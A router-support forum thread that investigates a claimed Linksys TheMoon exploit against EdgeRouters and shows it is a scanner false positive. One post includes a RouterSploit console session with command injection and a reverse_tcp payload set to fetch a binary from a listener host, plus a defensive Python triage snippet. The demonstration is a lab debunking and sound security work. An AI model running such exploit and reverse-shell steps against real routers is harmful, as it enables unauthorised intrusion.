New Member
Posts: 6
Registered: ‎10-22-2017
Kudos: 1

Re: EdgeMAX EdgeRouter software version v1.10.8 has been released!


@adminmat

 

Reports of a router coming back to life after being powered off for some hours might have to do with something timing out on the computer side rather than anything happening in the powered-off router.  Examples are a corrupt ARP cache or (for GUI access) network state data cached by the browser.  It might be worth a try to reboot the machine and/or clear the browser if you haven't done so already.

New Member
Posts: 17
Registered: ‎12-28-2018

Re: EdgeMAX EdgeRouter software version v1.10.8 has been released!

Thanks for the info. I tried rebooting the PC several times. I did not try clearing the browser. I will try this tonight. 

New Member
Posts: 4
Registered: ‎12-29-2018

Re: EdgeMAX EdgeRouter software version v1.10.8 has been released!


@waterside
Well, I tried using the exploit and got a command prompt. I didn't want to mess up the configuration, so I didn't try to mess around.

 

I backed it up now and tried to tamper in some basic commands to see if changes were made.

At least the one I tried didn't have any effect (luckily) which gives me a bit of comfort.

 

I'm still puzzled why I get the shell in the first place. I'm not into shell coding, so I don't know if that could take advantage of the exploit?

Nevertheless I hope you guys do a quick check and get back once either a false positive OR a fix is confirmed.

Senior Member
Posts: 3,234
Registered: ‎08-06-2015
Kudos: 1383
Solutions: 186

Re: EdgeMAX EdgeRouter software version v1.10.8 has been released!

@milez_teg

 

What exploit did you try, and from where?  You haven't provided details.

 

The exploit as I see documented does not provide a shell.

 

And again, the exploit you referenced is specific to Linksys routers and was a vulnerability in their firmware.  This is not something that would affect an EdgeRouter which is from a completely different vendor, with different hardware, and a completely different OS/firmware.

 

Are you sure you actually did this against an EdgeRouter?

 

New Member
Posts: 17
Registered: ‎12-28-2018

Re: EdgeMAX EdgeRouter software version v1.10.8 has been released!

So a little follow up @spaine and @iposner

 

My first EdgeRouter X was indeed bricked solid, as my pro friend had confirmed. I exchanged it at Micro Center for a new unit. This is what I did differently this time: I did not click on "Start With the Basic Setup Wizard" when the GUI opened. I clicked "No." I updated the firmware using the GUI, opened up PuTTY, confirmed the update was on the unit and DID NOT REBOOT via the GUI. I clicked no. I rebooted via PuTTY. After that all was good and I could connect to the ERx and confirmed the update to v1.10.8.

 

My friend thinks there was an issue with v1.9.7+hotfix.3 that caused the bricking as he noticed several issues and inconsistencies. 

 

I'm already running my AP the nanoHD and have a solid 230 Mbps at my laptops and phones. 

 

Oh, and when in Micro Center I picked up a USB to TTL cable. Living 6 minutes away from MC has its benefits.

 

Thanks for all the suggestions. 

Emerging Member
Posts: 85
Registered: ‎06-25-2015
Kudos: 26
Solutions: 1

Re: EdgeMAX EdgeRouter software version v1.10.8 has been released!

@adminmat - If this is to be an internet facing router, then you MUST change the admin password BEFORE connecting it to the internet (You can also disable the ubnt account and create another admin account). This is because there are BOTS scanning the internet looking for ubiquiti routers with default passwords and uploading malware. This is especially the case if you have not started with a default wizard. I would suggest that you start with the wizard unless you have an existing config from another old router you wish to apply.
New Member
Posts: 4
Registered: ‎12-29-2018

Re: EdgeMAX EdgeRouter software version v1.10.8 has been released!

@waterside

 

I took the 2x EdgeRouters offline and created a new separate "lab" network.

I don't like pentesting "in the open" as it could give some legal issues IF some tool by accident did something malicious on the internet.

 

Yes, I'm 100% sure it was my 2 edgerouters (1 lite and 1 edge X) and I tested with routersploit (autopwn). It scans for a lot of known exploits on multiple vendor devices, default passwords etc. 

It only returns the: "exploits/routers/linksys/eseries_themoon_rce" as a positive.

Yesterday I tried arming it offline and injecting. I got a shell, but at least I couldn't do anything useful. This is where I don't know if it is where my skills stop or if the exploit is a "false positive" that nevertheless gives some kind of shell?

 

I'm well aware that it is a Linksys exploit; however, many firms tend to follow the same "standards", which regardless of firm makes some code/firmware somewhat similar to some extent. It might be entirely different bitwise and the standard differently interpreted; however, at the end of the day it is the same requirements that the equipment has to follow (TCP/IP stack etc).

Anyway, as I stated it might not be a big deal, but I would expect a firm like Ubnt to have high interest in doing a quick test and either fix it or reply why it is a false positive.

New Member
Posts: 17
Registered: ‎12-28-2018

Re: EdgeMAX EdgeRouter software version v1.10.8 has been released!

@iposner I did go through the wizard to set up the router after I had updated the firmware. So the wizard was set up before I connected the internet cable to the EdgeRouter. Would this be an issue? Why do I need to change the local router password, even though I went through the wizard prior to connecting to the internet? It should have set up a firewall, correct?

Emerging Member
Posts: 58
Registered: ‎05-28-2018
Kudos: 16
Solutions: 3

Re: EdgeMAX EdgeRouter software version v1.10.8 has been released!

@adminmat

 

It is because the router can be accessed from BOTH the WLAN and LAN side!  (This allows the router to be managed by an offsite IT department.)

 

In fact, many gurus recommend that you set up an administrator with a different user name and delete the default user.

New Member
Posts: 17
Registered: ‎12-28-2018

Re: EdgeMAX EdgeRouter software version v1.10.8 has been released!

Thanks @frank1940

 

Now that I made the changes is there a way to scan for the malware? Does the malware infect the router firmware? Or just my PC? 

Emerging Member
Posts: 58
Registered: ‎05-28-2018
Kudos: 16
Solutions: 3

Re: EdgeMAX EdgeRouter software version v1.10.8 has been released!

Have a google using the terms "ubiquiti router malware". I didn't read the results, but it looks like there could be some.  Not sure what your risk factor is, as I am not sure what is actually behind your router.  Basically, is it a worthwhile target: monetary or informational?  IF you are a typical home user, you should have a low risk factor...

Regular Member
Posts: 579
Registered: ‎11-19-2012
Kudos: 305
Solutions: 6

Re: EdgeMAX EdgeRouter software version v1.10.8 has been released!

Senior Member
Posts: 3,234
Registered: ‎08-06-2015
Kudos: 1383
Solutions: 186

Re: EdgeMAX EdgeRouter software version v1.10.8 has been released!


@milez_teg wrote:

Yes, I'm 100% sure it was my 2 edgerouters (1 lite and 1 edge X) and I tested with routersploit (autopwn). It scans for a lot of known exploits on multiple vendor devices, default passwords etc. 

It only returns the: "exploits/routers/linksys/eseries_themoon_rce" as a positive.

 

Unfortunately you haven't really provided much detail.  What exactly did you run?  What exactly were the results?  If you only ran autopwn then you are likely receiving false positives that need further investigation.

 

Again - the results obtained from such scanners should not be taken as fact and instead should only be used as guidance for further investigation.  Far too much time is wasted by vendors (and others) tracking down and responding to repeated blind statements that their solutions are vulnerable simply because someone ran an automated scanner that said so.  This is counter-productive and costly.

 

I took a few minutes this evening to look into this a little further.  I have been unable to obtain any shell or run any commands on an ER-Lite-3 despite multiple repeated attempts with varying options.  One example:

rsf > use exploits/routers/linksys/eseries_themoon_rce
rsf (Linksys E-Series TheMoon RCE) > set arch mipsbe
[+] arch => mipsbe
rsf (Linksys E-Series TheMoon RCE) > set target 10.20.30.250
[+] target => 10.20.30.250
rsf (Linksys E-Series TheMoon RCE) > run
[*] Running module...
[+] Target is vulnerable
[*] Invoking command loop...
[*] It is blind command injection - response is not available

[+] Welcome to cmd. Commands are sent to the target via the execute method.
[*] For further exploitation use 'show payloads' and 'set payload <payload>' commands.

cmd > touch /tmp/this
[*] Executing 'touch /tmp/this' on the device...

cmd > set payload reverse_tcp
cmd (MIPSBE Reverse TCP) > set lhost 10.20.30.138
lhost => 10.20.30.138
cmd (MIPSBE Reverse TCP) > run
[*] Using wget method
[*] Using wget to download binary
[-] Exploit failed to transfer payload

 

Checking the device to see if the 'touch /tmp/this' worked (it did NOT):

user@lab-erl3:/tmp$ ls -ld /tmp/this
ls: /tmp/this: No such file or directory

 

I performed a packet capture on the router while running the above and it appears the test is mistaking an HTTP 301 response as a valid response.  The exploit first sends:

	POST /tmUnblock.cgi HTTP/1.1
	Host: 10.20.30.250
	User-Agent: python-requests/2.21.0
	Accept-Encoding: gzip, deflate
	Accept: */*
	Connection: keep-alive
	Content-Length: 169
	Content-Type: application/x-www-form-urlencoded

to which the router responds:

	HTTP/1.1 301 Moved Permanently
	Location: https://10.20.30.250:443/tmUnblock.cgi
	Content-Length: 0
	Date: Mon, 31 Dec 2018 04:16:17 GMT
	Server: Server

After this response the routersploit module immediately notes

[+] Target is vulnerable

However that is incorrect and only really means that the router is responding with an expected response, which includes the 301 redirect above.  Checking the code for RouterSploit it appears to look for one of three responses:

  • 200 - OK
  • 301 - Moved Permanently
  • 302 - Found

At this point the exploit has also not actually been attempted - it is only the first check to see if the attempt should continue.

 

A further manual test shows that using the new location from the 301 response indeed results in a 404 - Not Found error, which would indicate the router is not vulnerable.

 

 

So my efforts show the router is not vulnerable, which is as expected since, as already noted earlier, this is different hardware running a different OS (firmware) from a different vendor.  Further, the references identified all only identify older (pre-Cisco) Linksys routers and don't even hint that other devices could be impacted.

 

If you have more detail similar to what I posted above that contradicts my results then please do provide such detail.  It might actually be better to start this in a new thread if this is the case.  You noted previously that you did obtain a shell - could you do similar to what I did above, posting the actual output here and also showing an actual command or two that run with success, with the relevant evidence?
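As an added example (not from the thread, and not RouterSploit's own code), the triage logic the post above walks through, in Python: the module's 200/301/302 acceptance as "Target is vulnerable", then a check of the redirect target, with the 301 and 404 responses constructed from the exchange quoted above. The response parser, the `HttpResponse` class and the verdict strings are this example's own assumptions.

```python
# Added example (not from the thread): triage for a scanner verdict like the
# RouterSploit run above, which treats 200/301/302 on the first request as
# "Target is vulnerable". A 3xx only shows a redirect; a 404 at the redirect
# target is the false-positive signal the post describes.
from dataclasses import dataclass, field
from typing import Optional

SCANNER_ACCEPTS = {200, 301, 302}  # codes the module accepts as "vulnerable"

@dataclass
class HttpResponse:
    status: int
    headers: dict = field(default_factory=dict)

def parse_response(raw: str) -> HttpResponse:
    """Parse the head of a raw HTTP/1.x response (status line + headers)."""
    lines = raw.strip().splitlines()
    version, code, *_ = lines[0].split()
    if not version.startswith("HTTP/"):
        raise ValueError("not an HTTP status line: %r" % lines[0])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpResponse(int(code), headers)

def scanner_says_vulnerable(first: HttpResponse) -> bool:
    """The module's own decision, made from the first response alone."""
    return first.status in SCANNER_ACCEPTS

def triage(first: HttpResponse, at_location: Optional[HttpResponse] = None) -> str:
    """Classify a 'vulnerable' verdict. at_location is the response to the
    same probe re-sent to the first response's Location URL (None if not done)."""
    if not scanner_says_vulnerable(first):
        return "not flagged"
    if first.status == 200:
        return "unverified"  # 200 shows the endpoint answered, not that injection worked
    if "location" not in first.headers or at_location is None:
        return "inconclusive: re-send the probe to the redirect target"
    if at_location.status == 404:
        return "likely false positive: redirect target does not exist"
    return "unverified"

# Constructed sample responses, modelled on the exchange quoted in the post.
FIRST = parse_response("HTTP/1.1 301 Moved Permanently\r\n"
                       "Location: https://10.20.30.250:443/tmUnblock.cgi\r\n"
                       "Content-Length: 0\r\n")
AT_LOCATION = parse_response("HTTP/1.1 404 Not Found\r\nContent-Length: 0\r\n")
```

`triage(FIRST, AT_LOCATION)` reproduces the post's conclusion; the same function reports the 200 case as unverified, since a plain 200 is no proof of injection either.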

 

 

Emerging Member
Posts: 85
Registered: ‎06-25-2015
Kudos: 26
Solutions: 1

Re: EdgeMAX EdgeRouter software version v1.10.8 has been released!

@adminmat - As long as you deployed the wizard before you connected the router to the internet, you should be fine. Now that you've done that, it's prudent to disable the ubnt login, change its password and create a new admin user with a different password.

New Member
Posts: 17
Registered: ‎12-28-2018

Re: EdgeMAX EdgeRouter software version v1.10.8 has been released!


Thanks, yes I deployed the wizard. And made the credential changes. I found the section under the Config Tree where ports are assigned to SSH and Remote GUI access. I assume that the firewall rules override this and keep those ports closed.

 

Doesn't the modem from my ISP have a firewall as well? The tech support guy from my ISP had me plug the modem directly into my PC to run some speed tests etc. 

 

One more question, do I have to configure any firewall rules in the AP? Or is the basic setup, SSID and password enough? 

Established Member
Posts: 969
Registered: ‎02-12-2013
Kudos: 247
Solutions: 89

Re: EdgeMAX EdgeRouter software version v1.10.8 has been released!

@adminmat Extremely simplified.

If the ISP supplies a modem, then normally it does not come with a firewall - but if they supply a router, then yes, it usually comes with all bells and whistles.
Many, but not all, ISP routers can be setup in bridged mode, which means all NAT/firewall are bypassed, which is preferred when using your own router.

Usually the tech support wants as little equipment as possible, when trying to help a customer. They don't want to try to fix peoples wifi problems or problems with various equipment, that's why they ask you to connect directly to the router.

Think of your AP as a switch - it usually doesn't do anything besides distributing the traffic. Firewall'ing is done on the router.
New Member
Posts: 4
Registered: ‎12-29-2018

Re: EdgeMAX EdgeRouter software version v1.10.8 has been released!

@waterside Answer is appreciated and close to my own conclusion (despite the way you answered being a bit towards arrogant).
Better safe than sorry, especially when I get this funny limbo-kinda console/shell, whatever, though there is no reply. So probably something like you said, where the tool thinks the exploit is injected and basically just is sending commands towards a deaf HTTP.

Anyway, it is important to know it is a false positive, since otherwise it would affect my recommendations until fixed.

 

Thank you for the reply and happy new year.

New Member
Posts: 17
Registered: ‎12-28-2018

Re: EdgeMAX EdgeRouter software version v1.10.8 has been released!

Thanks @flamber and @iposner for the info. It's been up for a few days and running well. I ran an Android app called Network Analyzer on my phone (wifi off) over the mobile LTE and it could not find any open ports. That is a good sign.

 

I'd like to set up another small PC connected to this network. I'd like to use it for mass storage (NAS) and backups away from my main PC case AND to run the UniFi Controller 24/7. Do you guys have a resource for ABSOLUTE NOOBS on how to do this safely and securely? Is it best just to get a Cloud Key since I'm new at this? Will that help manage the storage?

 

And another dumb question: does the EdgeRouter OS or the AP keep track of network traffic / data when it's not running? (as in running on my PC?)

 

 

Emerging Member
Posts: 58
Registered: ‎05-28-2018
Kudos: 16
Solutions: 3

Re: EdgeMAX EdgeRouter software version v1.10.8 has been released!


@adminmat wrote:

<<snip>>

The tech support guy from my ISP had me plug the modem directly into my PC to run some speed tests etc. 

<<snip>> 

 


The tech support guy is not concerned about your security when he does this!  He is depending on your PC having a working software firewall running.  (And not running that way for very long...)  Most PCs do, but it is still best to have a dedicated NAT/firewall to provide most of the protection!

New Member
Posts: 17
Registered: ‎12-28-2018

Re: EdgeMAX EdgeRouter software version v1.10.8 has been released!

thanks @frank1940
